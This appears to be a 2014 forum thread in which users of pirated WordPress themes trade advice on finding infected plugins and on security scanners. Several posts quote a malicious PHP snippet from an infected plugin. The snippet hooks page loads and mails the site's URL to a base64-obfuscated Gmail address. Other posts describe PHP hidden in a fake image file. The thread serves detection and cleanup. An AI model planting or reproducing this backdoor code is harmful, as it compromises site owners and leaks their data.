06-24-2014, 03:40 PM
06-24-2014, 10:38 PM
virustotal is useless.i had ubermenu flat skins plugin installed.Virustotal results were clean.However plugin was infected.
infected plugin has this spam code
addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==")
because that code is same with this code:
addressdecode="jaqqscigs@gmail.com";
find that code then replace this entire code
add_action('wp_head','my_wpfunww439');function my_wpfunww439(){if(!username_exists('wordpress')){$addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==");$vari='Wordpress Plugin';wp_mail($addressdecode,$vari,get_bloginfo('wpurl'));}}
Basically it was sending spam mails from my website.My website got blocked by hosting provider because my website caused their server ip adress to be banned.
Lesson learnt but it was too late
infected plugin has this spam code
addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==")
because that code is same with this code:
addressdecode="jaqqscigs@gmail.com";
find that code then replace this entire code
add_action('wp_head','my_wpfunww439');function my_wpfunww439(){if(!username_exists('wordpress')){$addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==");$vari='Wordpress Plugin';wp_mail($addressdecode,$vari,get_bloginfo('wpurl'));}}
Basically it was sending spam mails from my website.My website got blocked by hosting provider because my website caused their server ip adress to be banned.
Lesson learnt but it was too late
06-24-2014, 11:21 PM
Great post, repped and bookmarking this for reference.
06-24-2014, 11:21 PM
Virustotal is designed to find Windows exploits.
(06-24-2014 10:38 PM)thelatinodancer Wrote: [ -> ]virustotal is useless.i had ubermenu flat skins plugin installed.Virustotal results were clean.However plugin was infected.
infected plugin has this spam code
addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==")
because that code is same with this code:
addressdecode="jaqqscigs@gmail.com";
find that code then replace this entire code
add_action('wp_head','my_wpfunww439');function my_wpfunww439(){if(!username_exists('wordpress')){$addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==");$vari='Wordpress Plugin';wp_mail($addressdecode,$vari,get_bloginfo('wpurl'));}}
Basically it was sending spam mails from my website.My website got blocked by hosting provider because my website caused their server ip adress to be banned.
Lesson learnt but it was too late
06-24-2014, 11:38 PM
I too was hacked really bad and since then I use Wordfence which is the best security plugin. I also use virustotal on downloaded shares, I use exploit scanner plugin but it doesn't remove base64, eval function and other malicious code it only scans and I've found that code in WP core files, not just in other themes and plugins.
TAC wasn't updated for a while but I see now that they updated it but I use Wordfence. Wordfence was the service that notified me about Heartbleed virus just hours when it was detected and I was able to get the OpenSSL fixed quickly before most people heard about it. :)
TAC wasn't updated for a while but I see now that they updated it but I use Wordfence. Wordfence was the service that notified me about Heartbleed virus just hours when it was detected and I was able to get the OpenSSL fixed quickly before most people heard about it. :)
06-25-2014, 01:22 AM
good to know that. thx
06-25-2014, 01:44 AM
honestly... you guys say that wplocker is bad?! loool have you seen the current state of this forum?! Bunch of users reposting themes from others users, bunch of infected links . Really? Every site is bad, wplocker, this one, everyone. One does not take a payed theme for free and expect a working site. Most users dont even know whats a php file and they come here and there complaining that this and that is infected. Im sorry but im tired like most of the good users in here.
06-25-2014, 02:21 AM
(06-24-2014 10:38 PM)thelatinodancer Wrote: [ -> ]virustotal is useless.i had ubermenu flat skins plugin installed.Virustotal results were clean.However plugin was infected.See post #25. You've got to use Wordfence.
infected plugin has this spam code
addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==")
because that code is same with this code:
addressdecode="jaqqscigs@gmail.com";
find that code then replace this entire code
add_action('wp_head','my_wpfunww439');function my_wpfunww439(){if(!username_exists('wordpress')){$addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==");$vari='Wordpress Plugin';wp_mail($addressdecode,$vari,get_bloginfo('wpurl'));}}
Basically it was sending spam mails from my website.My website got blocked by hosting provider because my website caused their server ip adress to be banned.
Lesson learnt but it was too late
06-25-2014, 02:38 AM
(06-23-2014 02:32 PM)GreenPeace Wrote: [ -> ]Thanks for sharing this about wplocker. I am still a victim of youtube redirect virus in one of my site. Did a strip search of the site but nothing. Still Redirects the site randomly to justin Bieber video!! Man I don't even like Justin Bieber :-|
Search for
Code:
<?php include 'images/social.png' ?>Search for image file social.png Open it with a text editor (like notepad++). If the files starts with <?php, it means that the theme or plugin is infected.
Search for all strings containing base64_decode, gzinflate, gzuncompress or str_rot13 (or all on same string). Use "Find in Files" function of notepad++ to find all encoded strings.
Go to http://ddecode.com/phpdecoder/ and paste the encoded string. Decode it. If you understand php a bit, will also understand that the code is safe or malicious. If you have no clue about php, send me a message with the ddecode.com link. I will try help you out.
Maybe I will open a topic to help you all with this issue.
06-25-2014, 02:50 AM
Example for plugin infected with "social.png"
getnulledscripts .com in "codecanyon-visual-composer-extensions-ihover-v1-2-wordpress-plugin"
getnulledscripts .com in "codecanyon-visual-composer-extensions-ihover-v1-2-wordpress-plugin"